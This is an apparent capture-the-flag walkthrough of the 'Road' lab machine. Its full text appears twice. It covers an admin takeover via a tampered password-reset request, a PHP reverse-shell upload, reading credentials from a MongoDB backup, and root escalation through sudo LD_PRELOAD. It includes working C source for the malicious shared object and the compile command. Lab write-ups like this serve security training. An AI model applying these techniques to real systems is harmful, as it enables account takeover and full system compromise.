Road

Vertical PrivEsc to admin - PHP File upload - Lateral Move via MongoDB - LD_PRELOAD PrivEsc to Root

Previous0day NextInferno

Last updated 2 years ago

Road

Vertical PrivEsc to admin - PHP File upload - Lateral Move via MongoDB - LD_PRELOAD PrivEsc to Root

Let's start by performing some active reconnaissance by running Nmap to scan for open ports

Enumerating the web application gives us options to either Log In or Sign In, since we dont have valid creds we can sign in as a test user and proceed to the dashboard interface

Once logged in as the user, we find that a user has a profile page and can upload a profile image :)

However, only the admin has the access to that feature. That being said, we retrieve the admin email as admin@sky.thm which is written in cleartext on the page

So how do we escalate our privileges as an admin, there are no JWT cookies :(
Observe the reset user page, The Username field is greyed out and only the password fields are editable - Let's quickly intercept that request and change the test user to admin user with the same password and get admin access :)
Now we sign in as admin@sky.thm and we can successfully upload a profile image.
Inspecting the source code of the profile page. We find a Url pathname has been commented out and it seems to be a reasonable location of where the uploaded profile images are stored

/v2/profileimages/

So now to trigger the reverse-shell, we can simply visit the

http://10.10.113.161/v2/profileimages/php-reverse-shell.php

Lateral Movement (www => webdeveloper)

We find out there are MongoDB and MySQL users in the /etc/passwd file
Which indicates that MongoDB might be running

we can get to know what all users are there on the system by running - getent passwd command

We conclude that MongoDB is indeed running. And we can now spin up MongoDB by running mongo on the terminal

Enter show dbs to list the available databases. The backup database looks the most interesting

Enter use backup to access the backup database.

Enter show collections;to list the tables on the database. We find a table user which could be interesting

Enter db.user.find(); to read the contents of the table. Bam! we obtain passwords for the user webdeveloper

Privilege Escalation

Enumerating this user, we use thesudo -l command to list all commands the webdeveloper user can run using sudo

LD_PRELOAD is a function that allows any program to use shared libraries(.so)
It pre_loads the .so files to the actual binary before even the program is executed during the run-time
In Order to exploit this vulnerability, we'll have to write a C program and compile it as a shared library

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() 
{
 unsetenv("LD_PRELOAD");
 setgid(0);
 setuid(0);
 system("/bin/bash");
}

We can save this code as shell.c and compile it using gcc into a shared object file using the following parameters and transfer it our victim machine

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

Now let's shoot our vulnerable binary as

$ sudo LD_PRELOAD=/home/webdeveloper/shell.so sky_backup_utility
root@sky:/home/webdeveloper# whoami
root

Previous0day NextInferno

Last updated 2 years ago

Let's start by performing some active reconnaissance by running Nmap to scan for open ports

Enumerating the web application gives us options to either Log In or Sign In, since we dont have valid creds we can sign in as a test user and proceed to the dashboard interface

Once logged in as the user, we find that a user has a profile page and can upload a profile image :)

However, only the admin has the access to that feature. That being said, we retrieve the admin email as admin@sky.thm which is written in cleartext on the page

So how do we escalate our privileges as an admin, there are no JWT cookies :(
Observe the reset user page, The Username field is greyed out and only the password fields are editable - Let's quickly intercept that request and change the test user to admin user with the same password and get admin access :)
Now we sign in as admin@sky.thm and we can successfully upload a profile image.
Inspecting the source code of the profile page. We find a Url pathname has been commented out and it seems to be a reasonable location of where the uploaded profile images are stored

/v2/profileimages/

So now to trigger the reverse-shell, we can simply visit the

http://10.10.113.161/v2/profileimages/php-reverse-shell.php

Lateral Movement (www => webdeveloper)

We find out there are MongoDB and MySQL users in the /etc/passwd file
Which indicates that MongoDB might be running

we can get to know what all users are there on the system by running - getent passwd command

We conclude that MongoDB is indeed running. And we can now spin up MongoDB by running mongo on the terminal

Enter show dbs to list the available databases. The backup database looks the most interesting

Enter use backup to access the backup database.

Enter show collections;to list the tables on the database. We find a table user which could be interesting

Enter db.user.find(); to read the contents of the table. Bam! we obtain passwords for the user webdeveloper

Privilege Escalation

Enumerating this user, we use thesudo -l command to list all commands the webdeveloper user can run using sudo

LD_PRELOAD is a function that allows any program to use shared libraries(.so)
It pre_loads the .so files to the actual binary before even the program is executed during the run-time
In Order to exploit this vulnerability, we'll have to write a C program and compile it as a shared library

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() 
{
 unsetenv("LD_PRELOAD");
 setgid(0);
 setuid(0);
 system("/bin/bash");
}

We can save this code as shell.c and compile it using gcc into a shared object file using the following parameters and transfer it our victim machine

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

Now let's shoot our vulnerable binary as

$ sudo LD_PRELOAD=/home/webdeveloper/shell.so sky_backup_utility
root@sky:/home/webdeveloper# whoami
root